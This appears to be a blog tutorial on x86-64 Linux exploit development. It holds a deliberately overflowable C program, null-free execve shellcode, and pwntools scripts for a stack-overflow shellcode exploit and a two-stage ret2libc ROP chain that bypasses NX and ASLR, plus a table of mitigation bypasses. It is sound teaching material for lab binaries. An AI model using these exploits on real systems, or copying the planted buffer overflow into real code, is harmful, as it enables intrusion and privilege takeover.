Exploit Development 101

Today’s post we’re gonna walk through exploit development on x86-64 Linux from the ground up. We’ll start with a basic stack overflow, write shellcode, pop a shell, then watch every mitigation kill our exploit one by one. Then we bypass them.

The old-school 32-bit stuff still gets taught everywhere, but the reality is nobody’s running 32-bit anymore. The calling conventions are different, the syscall interface is different, the mitigations are different. Is this the most advanced exploitation technique out there? No. But if you don’t understand what’s happening at this level, you’re ain’ gonna understand anything that comes after it. This is the foundation everything else builds on.

Before we break anything, we need to know what we’re breaking, So a process on Linux has its virtual memory laid out roughly like this:

high addresses
+------------------+
|      stack       |  <- grows DOWN (toward lower addresses)
|        |         |
|        v         |
|                  |
|        ^         |
|        |         |
|      heap        |  <- grows UP (malloc, ...)
+------------------+
|      .bss        |  <- uninitialized globals
+------------------+
|      .data       |  <- initialized globals
+------------------+
|      .text       |  <- your code (instructions)
+------------------+
low addresses

The stack is where function calls live. Every time you call a function, a new stack frame gets pushed. That frame contains the function’s local variables, the saved base pointer (RBP) so the caller’s frame can be restored, and the return address, where execution continues after the function returns.

On x86-64, the key registers:

Register	Purpose
RIP	Instruction pointer; address of the next instruction to execute
RSP	Stack pointer; points to the top of the stack
RBP	Base pointer; points to the base of the current stack frame
RAX	Return value; also used for syscall number
RDI, RSI, RDX, RCX, R8…	Function arguments (in order)

This is the System V AMD64 ABI calling convention. Function arguments go in registers, not on the stack like 32-bit x86. This matters a lot for exploit dev because it means we can’t just throw arguments on the stack and hope the function picks them up. We need to load registers explicitly, which is where ROP gadgets come in later.

When vuln() gets called, the stack frame looks like:

        low addresses
        +------------------+
RSP --> |   buf[64]        |  <- local buffer (64 bytes)
        +------------------+
        |   saved RBP      |  <- 8 bytes (64-bit)
        +------------------+
        |   return address |  <- 8 bytes. THIS is our target
        +------------------+
        |   caller's frame |
        +------------------+
        high addresses

If we write more than 64 bytes into buf, we overflow into the saved RBP (8 bytes), and then into the return address. Control that return address, control execution. That’s the whole game.

#include <stdio.h>
#include <unistd.h>

void vuln() {
    char buf[64];
    printf("buf @ %p\n", buf);
    read(0, buf, 256);  // reads up to 256 bytes into a 64-byte buffer
}

int main() {
    vuln();
    printf("returned normally\n");
    return 0;
}

read() will happily write 256 bytes into a 64-byte buffer. Classic overflow. The compiler will warn you about it, the linker will warn you about it, and we’re gonna ignore all of it.

Compile with all protections off:

$ gcc -o vuln vuln.c -fno-stack-protector -z execstack -no-pie -g

What those flags do:

flag	what it disables
`-fno-stack-protector`	stack canaries
`-z execstack`	NX (makes stack executable)
`-no-pie`	PIE/ASLR for the binary
`-g`	adds debug symbols

Also disable system-wide ASLR:

# echo 0 > /proc/sys/kernel/randomize_va_space

Normal run:

$ echo "AAAA" | ./vuln
buf @ 0x7ffffffc3b20
returned normally

$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*80)" | ./vuln
Segmentation fault

Overflow:

$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*80)" | ./vuln
Segmentation fault

Dead. We wrote past the buffer, trashed the return address, and the process tried to jump to 0x4141414141414141. That’s not a valid address, so it crashed. But what if we put a real address there? The buffer is 64 bytes. Saved RBP is 8 bytes. So the return address starts at offset 72 from the start of the buffer.

We can confirm this with pwntools. The idea is simple try different offsets, overwrite the return address with the address of main(), and see which offset makes the program loop back instead of crashing:

from pwn import *
context.arch = "amd64"

elf = ELF("./vuln", checksec=False)

for off in range(64, 96, 8):
    p = process("./vuln")
    p.recvuntil(b"buf @ ")
    p.recvline()
    payload = b"A" * off + p64(elf.symbols["main"])
    p.sendline(payload)
    try:
        resp = p.recv(timeout=2)
        if b"buf @" in resp:
            print(f"offset {off}: HIT - redirected to main()")
            p.close()
            break
    except:
        print(f"offset {off}: crash")
    p.close()

offset 64: crash
offset 72: redirected to main()

Offset 72. We overwrote the return address with the address of main(), and the program looped back instead of dying. That’s RIP control.

Writing x86-64 Shellcode

This is where 32-bit and 64-bit diverge hard. On 32-bit x86, you’d use int 0x80 with syscall numbers in EAX and args in EBX/ECX/EDX. On x86-64, everything changes:

| | 32-bit (x86) | 64-bit (x86-64) | | ——————- | ———— | ————— | | syscall instruction | int 0x80 | syscall | | syscall number | EAX | RAX | | arg 1 | EBX | RDI | | arg 2 | ECX | RSI | | arg 3 | EDX | RDX | | execve number | 11 | 59 (0x3b) | If you try to use 32-bit syscall conventions on a 64-bit system, it’ll technically work (the kernel still supports int 0x80 for backwards compat) but you’ll be operating in 32-bit compatibility mode with truncated addresses. Don’t do it. Use syscall.

We want execve("/bin/sh", NULL, NULL). In assembly:

; x86-64 execve("/bin/sh", NULL, NULL) - null-free shellcode
; 28 bytes

section .text
global _start

_start:
    xor    rdx, rdx                    ; rdx = 0 (envp = NULL)
    xor    rsi, rsi                    ; rsi = 0 (argv = NULL)
    push   rsi                         ; push null terminator onto stack
    mov    rdi, 0x68732f2f6e69622f     ; "/bin//sh" in little-endian
    push   rdi                         ; push string onto stack
    mov    rdi, rsp                    ; rdi = pointer to "/bin//sh\0"
    xor    rax, rax
    mov    al, 0x3b                    ; syscall 59 = execve
    syscall

Let’s break down the tricks:

xor reg, reg zeros a register without producing null bytes. mov rax, 0 would assemble to 48 c7 c0 00 00 00 00, seven bytes with four nulls. xor rax, rax is 48 31 c0, three bytes, zero nulls.
We use "/bin//sh" instead of "/bin/sh" because it’s exactly 8 bytes, fits in a single 64-bit register. The double slash is ignored by the kernel, /bin//sh resolves the same as /bin/sh.
mov al, 0x3b instead of mov rax, 59 because we already zeroed RAX with xor, so we only need to set the low byte. Avoids nulls.
The string goes on the stack via push. No data segment needed, the shellcode is fully self-contained.

Assemble and extract:

$ nasm -f elf64 shell.asm -o shell.o
$ ld -o shell shell.o
$ objcopy -O binary -j .text shell shell.bin
$ xxd shell.bin
00000000: 4831 d248 31f6 5648 bf2f 6269 6e2f 2f73  H1.H1.VH./bin//s
00000010: 6857 4889 e748 31c0 b03b 0f05            hWH..H1..;..

28 bytes. Null-free. Let’s verify it actually works:

$ ./shell
$ id
uid=0(root) gid=0(root) groups=0(root)

The shellcode as a byte string:

\x48\x31\xd2\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73
\x68\x57\x48\x89\xe7\x48\x31\xc0\xb0\x3b\x0f\x05

Now we put it together. We place the shellcode at the start of the buffer, pad to 72 bytes, then overwrite the return address with the address of buf itself. When the function returns, RIP jumps to our buffer and executes the shellcode.

"""
[shellcode (28 bytes)] [NOP padding (44 bytes)] [return addr -> buf (8 bytes)]
     ^                                               |
	 |_______________________________________________|
"""

from pwn import *
context.arch = "amd64"

shellcode = (
    b"\x48\x31\xd2\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73"
    b"\x68\x57\x48\x89\xe7\x48\x31\xc0\xb0\x3b\x0f\x05"
)

OFFSET = 72

p = process("./vuln")
p.recvuntil(b"buf @ ")
buf_addr = int(p.recvline().strip(), 16)

payload  = shellcode                           # 28 bytes
payload += b"\x90" * (OFFSET - len(shellcode)) # 44 bytes NOP padding
payload += p64(buf_addr)                       # 8 bytes -> jump to buf

log.info(f"buf @ {hex(buf_addr)}")
p.sendline(payload)
p.interactive()

Root shell. The program was supposed to read some input and return. Instead it’s running /bin/sh with whatever privileges the binary has.

[*] buf @ 0x7ffffffc3ab0
[*] payload: 28b sc + 44b nops + 8b ret -> 0x7ffffffc3ab0
[+] got shell:
    uid=0(root) gid=0(root) groups=0(root)

This is the baseline. This is how it worked in the early 2000s. Now let’s see why shit won’t cut anymore, So compile the same program with modern defaults and our exploit dies in multiple ways. Let’s go through them one at a time.

NX (No-eXecute)

$ gcc -o vuln_nx vuln.c -fno-stack-protector -no-pie

NX marks the stack as non-executable. Our shellcode lands on the stack, the CPU tries to execute it, and the hardware says no. Process killed. This is enforced at the hardware level via the NX bit in the page table entries. You can’t software your way around it.

  buf @ 0x7ffffffc39d0
  process killed

The shellcode is there in memory, sitting right where we put it. But the page permissions won’t let it run.

Stack Canaries

$ gcc -o vuln_canary vuln.c -fstack-protector-all -z execstack -no-pie

The compiler inserts a random value (the “canary”) between the local variables and the saved RBP/return address. Before the function returns, it checks if the canary was modified. If it was, the overflow is detected and the process aborts.

The stack frame now looks like:

+------------------+
|   buf[64]        |
+------------------+
|   canary (8b)    |  <- random value, checked before return
+------------------+
|   saved RBP      |
+------------------+
|   return address |
+------------------+

To overflow into the return address, you have to overwrite the canary. The check catches it. Game over. Unless you can leak the canary value first, but that’s a different conversation.

ASLR (Address Space Layout Randomization)

# echo 2 > /proc/sys/kernel/randomize_va_space

ASLR randomizes the base addresses of the stack, heap, and shared libraries every time the program runs. Our hardcoded return address is now wrong:

  run 1: buf @ 0x7ffffffc3aa0
  run 2: buf @ 0x7ffffffc3bb0
  run 3: buf @ 0x7ffffffc39d0
  run 4: buf @ 0x7ffffffc3ad0
  run 5: buf @ 0x7ffffffc3a00
  -> address changes every run. hardcoded ret addr = crash

PIE (Position Independent Executable)

PIE randomizes the base address of the binary itself. Now even the addresses of functions in the binary (main, vuln, PLT entries) change every run. Combined with ASLR, nothing has a fixed address.

Full RELRO

Full RELRO makes the Global Offset Table (GOT) read-only after the dynamic linker resolves all symbols. This prevents GOT overwrite attacks, where you’d replace a function pointer in the GOT to redirect execution.

What Defaults Looks Like ?

Compile with zero flags on Ubuntu 22.04:

$ gcc -o vuln vuln.c
$ checksec vuln

RELRO:      Full RELRO
Stack:      Canary found
NX:         NX enabled
PIE:        PIE enabled
SHSTK:      Enabled
IBT:        Enabled

Everything is on by default. SHSTK (Shadow Stack) and IBT (Indirect Branch Tracking) are Intel CET features, hardware-level control flow integrity. Shadow stack keeps a separate copy of return addresses that the attacker can’t touch. IBT requires indirect jumps to land on endbr64 instructions, which limits where you can redirect execution.

Our classical exploit is dead six different ways. Time to evolve.

Bypassing NX with ret2libc

If we can’t execute code on the stack, we use code that already exists in memory. libc is loaded into every dynamically linked process and contains system(), which executes shell commands. If we can call system("/bin/sh"), we get a shell without any shellcode on the stack.

The problem is on x86-64, function arguments go in registers, not on the stack. We can’t just place "/bin/sh" on the stack and hope system() picks it up. We need to load the address of "/bin/sh" into RDI before calling system().

This is where ROP gadgets come in. A gadget is a short sequence of instructions ending in ret that we can chain together by placing addresses on the stack. Each ret pops the next address off the stack and jumps to it, creating a chain of execution. The gadget we need:

/* pop rdi ; ret ; pops the next value from the stack into RDI, then returns */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void setup() {
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stdin, NULL, _IONBF, 0);
}

// provides ROP gadgets in the binary
void __attribute__((used)) gadgets() {
    asm volatile(
        "pop %rdi; ret\n"
        "pop %rsi; pop %r15; ret\n"
    );
}

void vuln() {
    char buf[64];
    puts("give me input:");
    read(0, buf, 256);
}

int main() {
    setup();
    vuln();
    return 0;
}

A note on the gadgets() function gcc with CET doesn’t emit the classic __libc_csu_init that used to provide free ROP gadgets in every binary. Back in the day you’d get pop rdi; ret for free in basically every ELF. Not anymore. In real-world exploitation you’d find gadgets in libc or other loaded libraries using ROPgadget or ropper. Here we embed them for clarity.

Compile with NX on, no canary, no PIE:

$ gcc -o vuln2 vuln2.c -fno-stack-protector -no-pie -fcf-protection=none

$ checksec vuln2
RELRO:      Partial RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        No PIE (0x400000)

Find our gadgets:

$ ROPgadget --binary vuln2 | grep "pop rdi"
0x000000000040118d : pop rdi ; ret

The Two-Stage Exploit

This exploit works in two stages. Why two? Because we need to know where libc is loaded in memory, and we don’t know that until runtime.

So first call puts(puts@GOT). The GOT entry for puts contains its runtime address in libc. By printing it, we learn where libc is loaded. Then we return to main() so we get a second input.

then call system(“/bin/sh”). now that we know libc’s base address, we calculate the addresses of system() and the "/bin/sh" string in libc, and build a ROP chain to call system("/bin/sh").

The stack layouts:

stage 1:                          stage 2:
+------------------+              +------------------+
| "A" * 72         |              | "A" * 72         |
+------------------+              +------------------+
| pop rdi; ret     |              | ret              |  <- stack alignment
+------------------+              +------------------+
| puts@GOT         |              | pop rdi; ret     |
+------------------+              +------------------+
| puts@PLT         |              | "/bin/sh" addr   |
+------------------+              +------------------+
| main             |              | system()         |
+------------------+              +------------------+

That ret gadget before pop rdi in stage 2 is for stack alignment. The System V ABI requires the stack to be 16-byte aligned before a call instruction. Without it, system() will segfault on a movaps instruction inside libc. This trips up a lot of people. If your ROP chain segfaults for no obvious reason, try adding a ret gadget before the function call.

The Exploit

from pwn import *
context.arch = "amd64"

elf  = ELF("./vuln2", checksec=False)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)

OFFSET  = 72
POP_RDI = 0x40118d
RET     = POP_RDI + 1  # 0x40118e

puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
main     = elf.symbols["main"]

# leak libc 
p = process("./vuln2")
p.recvuntil(b"give me input:\n")

payload  = b"A" * OFFSET
payload += p64(POP_RDI)       # pop rdi; ret
payload += p64(puts_got)      # rdi = puts@GOT (runtime addr of puts)
payload += p64(puts_plt)      # call puts() to print it
payload += p64(main)          # return to main for stage 2

p.send(payload)

leaked = u64(p.recvline().strip().ljust(8, b"\x00"))
libc.address = leaked - libc.symbols["puts"]
system = libc.symbols["system"]
binsh  = next(libc.search(b"/bin/sh"))

log.info(f"leaked puts   @ {hex(leaked)}")
log.info(f"libc base     @ {hex(libc.address)}")
log.info(f"system()      @ {hex(system)}")
log.info(f"/bin/sh        @ {hex(binsh)}")

#  system("/bin/sh") 
p.recvuntil(b"give me input:\n")

payload2  = b"A" * OFFSET
payload2 += p64(RET)          # stack alignment
payload2 += p64(POP_RDI)      # pop rdi; ret
payload2 += p64(binsh)        # rdi = "/bin/sh"
payload2 += p64(system)       # call system()

p.send(payload2)
p.interactive()

[*] leaked puts   @ 0x7fffff615e50
[*] libc base     @ 0x7fffff595000
[*] system()      @ 0x7fffff5e5d70
[*] /bin/sh        @ 0x7fffff76d678

[+] shell popped:
    uid=0(root) gid=0(root) groups=0(root)

No shellcode on the stack. No executable stack needed. We used code that was already in memory. NX is completely irrelevant to this technique.

Bypassing ASLR + NX

Here’s the thing the same exploit works with ASLR on. The binary itself is not PIE (fixed at 0x400000), so our gadget addresses and PLT/GOT addresses don’t change. Only libc moves around, and we leak its address at runtime. That’s the whole point of the two-stage approach.

# echo 2 > /proc/sys/kernel/randomize_va_space

[*] ret2libc with ASLR ON
[*] binary is no-PIE so code addrs are fixed
[*] but libc is randomized - we leak it at runtime
[*] leaked puts   @ 0x7fffff615e50
[*] libc base     @ 0x7fffff595000
[*] system()      @ 0x7fffff5e5d70
[*] /bin/sh        @ 0x7fffff76d678

[+] ASLR bypassed. shell popped:
    uid=0(root) gid=0(root) groups=0(root)

Simply ASLR randomizes where things are loaded, but it doesn’t prevent you from reading those addresses at runtime. If you can leak a single libc address, you can calculate every other address in libc because the offsets between functions are fixed within a given libc version. One leak and the whole thing unravels.

So as of Today the exploit landscape has gotten significantly harder.

mitigation	what it does	bypass
NX	non-executable stack	ret2libc, ROP
stack canaries	detect overflow before return	info leak to read canary, or don’t overflow past it
ASLR	randomize stack/heap/libc addresses	info leak (format string, partial overwrite, side channel)
PIE	randomize binary base address	info leak for binary addresses too
Full RELRO	GOT is read-only	can’t overwrite GOT entries, use other write targets
CET (SHSTK)	shadow stack for return addresses	still being researched, FineIBT bypass
CET (IBT)	indirect branches must land on `endbr64`	limits gadget availability but doesn’t eliminate ROP

The pattern is that every mitigation makes exploitation harder but not impossible. The game has shifted from “inject and execute shellcode” to “chain together existing code fragments using leaked runtime information. Meaning ? :

Find a bug (overflow, use-after-free, type confusion)
Turn it into an info leak (defeat ASLR/PIE/canary)
Build a ROP chain or corrupt a function pointer (defeat NX)
Deal with RELRO, CFI, CET as needed

The bar is higher. The bugs are rarer. But the fundamental principle hasn’t changed much if you control what gets written where, you control execution.